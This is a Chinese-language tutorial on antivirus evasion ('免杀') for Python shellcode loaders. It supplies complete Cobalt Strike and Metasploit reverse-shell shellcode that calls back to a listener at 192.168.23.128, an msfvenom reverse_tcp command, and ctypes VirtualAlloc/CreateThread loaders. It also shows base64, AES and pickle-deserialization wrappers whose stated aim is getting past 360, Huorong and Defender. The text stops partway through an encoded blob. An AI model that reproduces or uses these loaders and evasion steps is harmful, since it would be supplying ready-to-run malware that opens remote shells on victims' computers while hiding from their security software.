Shellcode Python免杀,绕过360安全卫士、火绒安全、Defender
Python基于cs/msf的上线
cs
执行代码2种可供选择
执行代码 1: rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) 执行代码 2: ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctype s.c_int(-1))
先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)
得到payload放到上面的代码里
import ctypes # #cs shellcode=b'\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x58\x68\x52\x4b\x00\xca\x09\x59\x57\x77\xdd\x10\x6c\x09\xe4\x28\x9b\x23\x3d\x22\xe1\x61\xb0\x57\xe2\x93\x76\x13\x28\x6d\x71\x87\xf6\xf6\xfe\x1b\xfe\x95\x3d\x25\x39\x7f\x0d\xe9\x2a\x89\x23\x5c\x83\x5a\x35\x3f\xa9\x13\x5f\x55\x36\x62\x05\x2f\x70\x7d\xcf\x35\x8b\xcd\xdb\x00\x76\x97\x6f\x78\xe8\x37\x6a\x60\x4f\x27\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x73\xd7\xa1\x38\x25\xce\xf8\xaf\x28\xc1\x20\xf4\x7a\x64\xaa\x3e\x20\x62\x0b\x71\xd1\xdf\xe1\x43\x4a\xcb\x51\x17\x65\xd0\x43\x44\x87\x7e\x73\x1f\x88\x72\x61\xb8\x83\xf8\xec\x34\x0b\xb4\x9b\xe9\xcb\x93\x99\x27\x8e\x4b\x50\xb7\x11\x08\x1f\x6a\x88\xcf\x17\x17\x2c\x46\x4c\xe2\xad\xb4\xe7\x16\x3e\x5f\x9f\x09\xa7\x84\x91\xdb\xb8\xa4\x33\x02\x49\xb0\xf7\x43\x96\x80\x2d\xb0\xd3\xfb\xd9\x0e\xcf\x86\xa0\x4f\x1d\x9f\xbd\x4b\xe7\xb6\x82\xf0\x5a\xb1\x7d\xfc\xe9\x2d\xfb\x2a\x05\x84\x07\x2c\x3a\xf7\xb0\xf7\xf7\x4f\xf8\xe1\x92\xd7\xc3\xa0\x5a\xc4\xa2\x4e\x9b\x51\x20\x20\xdb\x85\xf8\x07\x6c\xfd\x75\xc2\x1e\xca\x66\xa6\x34\x94\xee\xae\xc5\x23\x87\x15\xb5\xae\x2a\xcb\x36\xa8\xb6\x7d\xb4\x72\xa6\xc1\xb5\xcc\x82\xd7\x88\x23\x58\x83\xa0\xe8\x7b\x2f\xd0\xd8\xbc\x95\x97\xd6\x03\x7f\x8e\x11\x68\x33\xbc\xd7\x3a\xa4\x22\xaa\x9d\x55\x86\xe4\x51\x13\x89\x35\x3e\xca\x44\xc4\x03\x84\x5e\xbc\xf1\x62\xf9\x8d\x42\x4f\x3e\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x2e\x31\x32\x38\x00\x00\x01\x86\xa0' rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
运行
可以看到上线成功
msf
开启msf,生成paylosd,依旧x86,C语言
注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦
import ctypes #msf shellcode = b"" shellcode += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" shellcode += b"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7" shellcode += b"\x4a\x26\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" shellcode += b"\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57\x01" shellcode += b"\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x50" shellcode += b"\x01\xd3\x8b\x48\x18\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34" shellcode += b"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75" shellcode += b"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01" shellcode += b"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01" shellcode += b"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58" shellcode += b"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00" shellcode += b"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8" shellcode += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" shellcode += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x17\x80\x68\x02\x00" shellcode += b"\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" shellcode += b"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74" shellcode += b"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67" shellcode += b"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f" shellcode += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10" shellcode += b"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53" shellcode += b"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8" shellcode += b"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b" shellcode += b"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e" shellcode += b"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff" shellcode += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a" shellcode += b"\x00\x53\xff\xd5" print(shellcode) # shellcode=b'\xfc\xe8\x8f\x00\x00\x00`\x89\xe51\xd2d\x8bR0\x8bR\x0c\x8bR\x14\x0f\xb7J&1\xff\x8br(1\xc0\xac<a|\x02, \xc1\xcf\r\x01\xc7Iu\xefR\x8bR\x10\x8bB<W\x01\xd0\x8b@x\x85\xc0tL\x01\xd0P\x8bX \x8bH\x18\x01\xd3\x85\xc9t<1\xffI\x8b4\x8b\x01\xd61\xc0\xac\xc1\xcf\r\x01\xc78\xe0u\xf4\x03}\xf8;}$u\xe0X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0X_Z\x8b\x12\xe9\x80\xff\xff\xff]h32\x00\x00hws2_ThLw&\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00)\xc4TPh)\x80k\x00\xff\xd5j\nh/^\xecuh\x02\x00\x1a \x89\xe6PPPP@P@Ph\xea\x0f\xdf\xe0\xff\xd5\x97j\x10VWh\x99\xa5ta\xff\xd5\x85\xc0t\n\xffN\x08u\xec\xe8g\x00\x00\x00j\x00j\x04VWh\x02\xd9\xc8_\xff\xd5\x83\xf8\x00~6\x8b6j@h\x00\x10\x00\x00Vj\x00hX\xa4S\xe5\xff\xd5\x93Sj\x00VSWh\x02\xd9\xc8_\xff\xd5\x83\xf8\x00}(Xh\x00@\x00\x00j\x00Ph\x0b/\x0f0\xff\xd5WhunMa\xff\xd5^^\xff\x0c$\x0f\x85p\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3)\xc6u\xc1\xc3\xbb\xf0\xb5\xa2Vj\x00S\xff\xd5' rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
msf开启监听(上面有详细步骤),然后运行脚本,成功上线
免杀开始
原理
可以看出Python的shellcode主要是payload和加载器,所以主要从咱俩方面入手
1.对payload进行编码
2.更换加载器
payload进行base64编码
下面是编码代码
import base64 #cs shellcode=b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x59\x61\x4f\x53\x00\xce\x7a\x92\xe0\x91\x59\x95\x01\xda\xc8\xe9\xfd\x90\xa0\x15\xbf\xb0\x69\xee\xcc\xd9\x04\x97\x51\xcd\x08\xf7\x2f\x79\xf1\x65\xb1\xf3\x75\xac\x94\x51\x72\x92\xe2\x7b\x95\x81\x15\xb4\x2a\xac\x36\xa4\x78\x00\xaa\x6a\x0e\x12\x01\xba\x28\x75\x65\xfc\x85\xd1\xef\x01\x42\x9a\x28\x2d\x4e\xdb\x90\x11\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x35\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x3b\x20\x44\x69\x67\x45\x78\x74\x3b\x20\x44\x54\x53\x20\x41\x67\x65\x6e\x74\x0d\x0a\x00\x37\x95\x35\x48\xc7\x9a\xfc\x03\x3f\xd6\x1c\x4b\x7c\xb6\xea\x21\x49\xd9\xdb\x1a\xec\x3f\x50\xb1\x66\x9d\x5b\x97\xd0\x57\xfd\xdf\xb8\xbf\xa5\x05\xe4\x22\x3a\x91\x90\x95\xaf\x57\xaa\xa2\x4e\x06\x35\xd8\x5c\x0b\x11\x24\x21\x59\x04\xa0\xbf\xda\x7c\x6a\x06\xab\xf0\x72\x99\x4d\xd2\xf4\xc6\xbe\x00\xd4\xa8\x16\xe1\x93\x19\x5b\x12\xc3\xc9\x18\x5d\x82\xb0\x1d\x9a\xc1\x2d\x71\x6e\x7a\x15\x5b\x12\x5a\xa9\xfd\x01\x23\x40\xc9\x21\x8c\x2b\xfa\x9c\xf1\x25\x5c\x04\x91\xe3\x9c\x78\x4a\x84\x51\x04\x11\x8e\x65\xdb\xea\x49\x7e\x48\xae\x0a\xb3\x40\xb4\x37\x73\x5f\xdf\x8d\xca\xe6\x0c\x4e\x5f\xe5\xc2\x58\x52\x43\x1b\x23\xcf\x72\x12\xb1\x41\x2f\x8f\x51\xe4\xca\x91\x43\x8e\x22\xa4\x3e\x4f\xd4\x04\x37\x15\xc6\xeb\x2a\x37\x00\x72\x72\xc8\x97\x4b\x5b\x02\x7c\xb4\xef\x63\xc6\x63\xac\x55\x41\xa3\xed\xac\x96\x46\x07\x44\x9f\x1c\x1a\x2e\xec\xc0\x69\x88\x42\xbc\x6a\x36\xce\x6a\x3e\x9b\x4a\xee\xfb\x70\xa2\x8a\x29\xd0\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x2e\x31\x32\x38\x00\x00\x01\x86\xa0" s = base64.b64encode(shellcode) print(s)
或者直接msf加密也可
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=162.178.23.128 lport=4444 -f c
然后将结果替换之前shellcode的位置,记得加上解码
import ctypes import base64 #cs shellcode=b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vWWFPUwDOepLgkVmVAdrI6f2QoBW/sGnuzNkEl1HNCPcvefFlsfN1rJRRcpLie5WBFbQqrDakeACqag4SAboodWX8hdHvAUKaKC1O25ARAFVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDUuMDsgV2luZG93cyBOVDsgRGlnRXh0OyBEVFMgQWdlbnQNCgA3lTVIx5r8Az/WHEt8tuohSdnbGuw/ULFmnVuX0Ff937i/pQXkIjqRkJWvV6qiTgY12FwLESQhWQSgv9p8agar8HKZTdL0xr4A1KgW4ZMZWxLDyRhdgrAdmsEtcW56FVsSWqn9ASNAySGMK/qc8SVcBJHjnHhKhFEEEY5l2+pJfkiuCrNAtDdzX9+NyuYMTl/lwlhSQxsjz3ISsUEvj1HkypFDjiKkPk/UBDcVxusqNwBycsiXS1sCfLTvY8ZjrFVBo+2slkYHRJ8cGi7swGmIQrxqNs5qPptK7vtwooop0ABo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4yMy4xMjgAAAGGoA==' shellcode=base64.b64decode(shellcode) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
运行看是否可以上线,可以看到再次上线成功
aes加密
使用脚本,先对payload进行base64加密,再进行aes加密
from Crypto.Cipher import AES from binascii import b2a_hex, a2b_hex import base64 # 如果text不足16位的倍数就用空格补足为16位 def add_to_16(text):if len(text.encode('utf-8')) % 16:add = 16 - (len(text.encode('utf-8')) % 16)else:add = 0text = text + ('\0' * add)return text.encode('utf-8') # 加密函数 def encrypt(text):key = '9999999999999999'.encode('utf-8')iv = b'qqqqqqqqqqqqqqqq'mode = AES.MODE_CBCcryptos = AES.new(key, mode, iv)plain_text = add_to_16(text)cipher_text = cryptos.encrypt(plain_text)return b2a_hex(cipher_text).decode() if __name__ == '__main__':plaintext = "Your_plaintext_here" # 你想要加密的内容encrypted_text = encrypt(plaintext)print("Encrypted text:", encrypted_text)
加密结果替换后,最后运行解密脚本
from Crypto.Cipher import AES from binascii import b2a_hex, a2b_hex import ctypes,base64 # 如果text不足16位的倍数就用空格补足为16位 def add_to_16(text):if len(text.encode('utf-8')) % 16:add = 16 - (len(text.encode('utf-8')) % 16)else:add = 0text = text + ('\0' * add)return text.encode('utf-8') # 解密后,去掉补足的空格用strip() 去掉 def decrypt(text):key = '9999999999999999'.encode('utf-8')iv = b'qqqqqqqqqqqqqqqq'mode = AES.MODE_CBCcryptos = AES.new(key, mode, iv)plain_text = cryptos.decrypt(a2b_hex(text))shellcode=bytes.decode(plain_text).rstrip('\0')return shellcode def zhixing(shellcode):rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1) if __name__ == '__main__':#cse='0e0d6b374430510532fb94ec3f9e3e933e26c58c784e26a7a50308a6cb9286b75810a376913a4d162ce26bf16c27d8924223ea45360e595f28130c67ef3e51c6f1b21d375aaa1b97e74bab97c9b87f80842cf3597d9b5cfbe361c30c54cce15aa6fafc88fd015f303c60a96900736b35f9d8aa9f0b8f1f89133d959a633e471a6b8aa5004d271541075a6bff3dcea93036aa3ebb4621eec32350be5b73e2aa90370b97c1544258f017466e8235f03b17b282ecbd6845340ca1f87e6f58a844974aa52f1544f92df67cc29046a14c0f6528c1b20e8f82e81ff182dba4d6320082ca98bb13d28ddc7304198039b87560a12054769073faa0bb0f07ac4b12cb19c48c7d3c002d19e5e6d439f1c822e7a6fbcef094f6840aec0672d8b2b669a0fed0bbe954260658ce63e4c75e307d47528fae505ee795a14a2f0e51812119e5480a6ee0b267be2df03994c8564aac446538a6fa2d65912ee020d783603ba3fb7bb5653994418cbe6d9a30c2730c043876d5713423d60d622fbfa418f25d28f3c6599df2d4458be05e1bfbd60abc3ef71cd64812681308f73920ef7fab1318758e8a940ba7eafa3599971b841069b67ef10b88ba58b9ad13ac676700394ec521eb040acd080f491903baa8352f8db8114ea920690978aea20c30855b786124f3d27b90155ee3533ee3620a5f48d26e38b60d786d2e7ff41a07fcc9c1e0abbacfce32b5765901b576fe110bed31374b8de6c4db5316c57dda772fe5b1736b5314e2a3b8b1d665e272024dfd433b0dbd0fef3981f5087866bba50a686575e2b0f26903a54172826e0bb3713cf85b29e227c69fb6f31ca2d462decc5e3213fbb472bbd91a47316ce02b7a99122543b7db75de61e5a34944f10c08dd5ecac8f3b7e28bbe24f2cb3ef6258ef404ab222b9f128acdeec3e8dd123273fb0db73f66fe6e06e6276e3294bac412689da195e240c37b0d7803ceab2deee1a4902ef3b85a1d81a5128591a31d7b12f1773c54fbd56ebdee86f19d0cd100dd83964c8525e2f3af81c4d19603483af04b8d2d21b026ae2af9edc293c66ee40d6be7ffa35b5b0e8e5ece4f9b15097ab1471b3fa5cc8d6ee1431a8a32562641e36fc5b44c422e25482ca319882691150f8713cd8d90ed3eacec170039923a8c4b70d64773260a30d23526356c31a40675b54d6546b1c84ae338f6173eeacb03a892331dc5e9cbf0b78a2bb5ceb434d7d72441565620a9c4ab156030f35ede7dad650483cbdf8e91d64250c6dbefe3ffeaa3ea77f82f270b48a232d35fb66db49aae980180625387a8bf317beed2f612c546f015864578629c020c8f2fca445bd03c74bf7bb882d051a9b8c55ce2cc73948ad171d3a802f8bbe1b542fc36b26171d2d02e2c4cd56e2bad9983145c7011d00e5cc77967b5b980ccb9b4fd6f28efcc8538cc62d5f9ddf9e67609ce9de733109f4c8ccfbfd705d068f2e09618838270591553d662713754382047a2f8dd65e6850db61bc4ad61606e'd = decrypt(e) # 解密d=base64.b64decode(d)zhixing(d)
依旧可以上线
反序列化
思路:
本地对代码进行序列化
生成对象A的序列化数据并base64编码
调用魔术手法生成进行exec shellcode
shellcode是上面base64编码上线的整个代码(意思是执行那堆代码)
import pickle import base64 shellcode = ''' import ctypes import base64 encode_shellcode = b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vRk14UQBuiBaVc/3Tji6rkQp7PpYkSpkLwkdf4eOFb1MSnNliqZdWFbJlK72bpKesiSBWHRtQERLSdHaYJwsW7q3KR2NhXjtRRVlRKUbvAFVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjA7IFRyaWRlbnQvNC4wKQ0KAG128dAxRkkmeTLV3SqJ5sJU662zTZS0F8jSp+LEi5SPc2GBXqsiCWvOV0JwyNCp3i0vCTOkcMtwrTmdcNrENa8zeHczC9QZsdwoEkRS5X+gI8fbLkaUjH6YJ9Sr4IozTjdn0MCTMQpCnE25WXVcw4SJv4uWGPHgWJftM/6J9JJmQFVb7XpSXe/nb7sYJxP5QV73Sgr1nQRvScFfb6R/DXnhbaVS5C/In7yWSvMm327+lffyiWRQy1qi+VwWm83LcxG5TqZfbB8yhqfig4y3ILh+Hutw21ZVp9AWNbSpkQxS7QBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4yMy4xMjgAAAGGoA==' shellcode = base64.b64decode(encode_shellcode) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1) ''' class A(object):def __reduce__(self):return (exec,(shellcode,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) print(ret_base64)
靶机上对代码进行反序列化
import base64,pickle,ctypes shellcode=b'gASV4AUAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFjBBQAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKZW5jb2RlX3NoZWxsY29kZSA9IGInL09pSkFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVWkzSW9EN2RLSmpIL01jQ3NQR0Y4QWl3Z3djOE5BY2ZpOEZKWGkxSVFpMEk4QWRDTFFIaUZ3SFJLQWRCUWkwZ1lpMWdnQWRQalBFbUxOSXNCMWpIL01jQ3N3YzhOQWNjNDRIWDBBMzM0TzMwa2RlSllpMWdrQWRObWl3eExpMWdjQWRPTEJJc0IwSWxFSkNSYlcyRlpXbEgvNEZoZldvc1M2NFpkYUc1bGRBQm9kMmx1YVZSb1RIY21CLy9WTWY5WFYxZFhWMmc2Vm5tbi85WHBoQUFBQUZzeHlWRlJhZ05SVVdoUUFBQUFVMUJvVjRtZnh2L1Y2M0JiTWRKU2FBQUNRSVJTVWxKVFVsQm82MVV1Ty8vVmljYUR3MUF4LzFkWGF2OVRWbWd0QmhoNy85V0Z3QStFd3dFQUFESC9oZlowQkluNTZ3bG9xc1hpWGYvVmljRm9SU0ZlTWYvVk1mOVhhZ2RSVmxCb3QxZmdDLy9WdndBdkFBQTV4M1MzTWYvcGtRRUFBT25K